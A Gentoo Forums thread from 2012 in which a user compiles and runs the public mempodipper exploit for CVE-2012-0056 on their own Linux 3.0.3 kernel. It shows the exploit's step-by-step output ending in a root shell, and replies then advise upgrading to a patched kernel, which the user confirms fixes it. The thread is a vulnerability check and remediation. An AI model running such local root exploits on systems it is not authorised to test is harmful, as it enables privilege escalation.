Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in

  FAQ | Search | Memberlist | Usergroups | Statistics | Profile | Log in to check your private messages | Log in | Register

mempodipper - root exploit [CVE-2012-0056] [SOLVED]
 View unanswered posts
View posts from last 24 hours

 
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
upengan78
l33t
l33t


Joined: 27 Jun 2007
Posts: 711
Location: IL
PostPosted: Wed Jan 25, 2012 6:11 pm    Post subject: mempodipper - root exploit [CVE-2012-0056] [SOLVED] Reply with quote
More info:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc

On my gentoo -

3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux


Code:
user@hostname:/nfs1 $ 12:08 PM]gcc -o mempodipper mempodipper.c
user@hostname:/nfs1 $ 12:08 PM]./mempodipper
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x402240.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12838/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x402234.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),7(lp),10(wheel),18(audio),35(games),1015(qemu)
sh-4.1#uname -a
3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux


Last edited by upengan78 on Wed Jan 25, 2012 7:42 pm; edited 1 time in total
Back to top
View user's profile Send private message
avx
Advocate
Advocate


Joined: 21 Jun 2004
Posts: 2152
PostPosted: Wed Jan 25, 2012 6:14 pm    Post subject: Reply with quote
Yeah, umh? Update your kernel, the recent versions (3.1, 3.2.1) are already patched.
_________________
++++++++++[>+++++++>++++++++++>+++>+<<<<-]>++.>+.+++++++..+++.>++.<<+++++++++++++++.>.+++.------.--------.>+.>.
Back to top
View user's profile Send private message
upengan78
l33t
l33t


Joined: 27 Jun 2007
Posts: 711
Location: IL
PostPosted: Wed Jan 25, 2012 7:21 pm    Post subject: Reply with quote
Thanks. I tried 3.1.6 and exploit worked on it. So put 3.2.1-gentoo-r2 and all is good now.
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



 Links: forums.gentoo.org | www.gentoo.org | bugs.gentoo.org | wiki.gentoo.org | forum-mods@gentoo.org

Copyright 2001-2025 Gentoo Foundation, Inc. Designed by Kyle Manna © 2003; Style derived from original subSilver theme. | Hosting by Gossamer Threads Inc. © | Powered by phpBB 2.0.23-gentoo-p11 © 2001, 2002 phpBB Group
Privacy Policy